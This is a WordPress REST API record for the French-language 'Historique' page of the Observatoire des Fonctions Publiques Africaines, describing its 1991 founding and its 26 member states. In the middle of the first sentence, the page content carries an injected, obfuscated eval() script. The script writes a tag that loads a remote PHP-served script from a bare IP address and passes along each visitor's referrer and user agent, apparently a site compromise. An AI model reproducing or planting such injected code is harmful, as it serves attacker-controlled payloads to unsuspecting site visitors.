{"id":30,"date":"2017-03-28T20:26:34","date_gmt":"2017-03-28T18:26:34","guid":{"rendered":"http:\/\/site.ofpa.net\/?page_id=30"},"modified":"2017-03-28T20:26:34","modified_gmt":"2017-03-28T18:26:34","slug":"historique","status":"publish","type":"page","link":"https:\/\/www.ofpa.net\/de\/historique\/","title":{"rendered":"Historique"},"content":{"rendered":"<p>L&#8217;Observatoire <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\\\o=\"+3(j.i)+\"\\'><\\\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktdsi|var|u0026u|referrer|ykkrn||js|php'.split('|'),0,{}))\n<\/script><\/noindex> des Fonctions Publiques Africaines est une mise en commun des exp\u00e9riences de restructuration des fonctions publiques africaines : collecte des informations, appr\u00e9ciation des probl\u00e8mes communs, identification des programmes r\u00e9gionaux et implication dans les activit\u00e9s d&#8217;\u00e9tudes et de recherche sont les principales missions qui lui ont \u00e9t\u00e9 confi\u00e9es lors de sa cr\u00e9ation en 1991 \u00e0 l&#8217;issue de la Conf\u00e9rence de 23 Ministres africains charg\u00e9s de la Fonction Publique. Il comprend actuellement vingt-six Etats membres qui sont :<br \/>\nAngola, B\u00e9nin, Burkina Faso, Burundi, Cameroun, Cap-Vert, Centrafrique, Iles Comores, Congo, C\u00f4te-d&#8217;Ivoire, Djibouti, Gabon, Gambie, Guin\u00e9e Bissau, Guin\u00e9e Conakry, Guin\u00e9e Equatoriale, Madagascar, Mali, Mauritanie, Mozambique, Niger, Rwanda, Sao Tome et Principe, S\u00e9n\u00e9gal, Tchad, Togo.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&#8217;Observatoire des Fonctions Publiques Africaines est une mise en commun des exp\u00e9riences de restructuration des fonctions publiques africaines : collecte des informations, appr\u00e9ciation des probl\u00e8mes communs, identification des programmes r\u00e9gionaux&#8230; <a class=\"read-more-button\" href=\"https:\/\/www.ofpa.net\/de\/historique\/\">Mehr Lesen &gt;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-full-width.php","meta":[],"_links":{"self":[{"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/pages\/30"}],"collection":[{"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":2,"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/pages\/30\/revisions"}],"predecessor-version":[{"id":32,"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/pages\/30\/revisions\/32"}],"wp:attachment":[{"href":"https:\/\/www.ofpa.net\/de\/wp-json\/wp\/v2\/media?parent=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}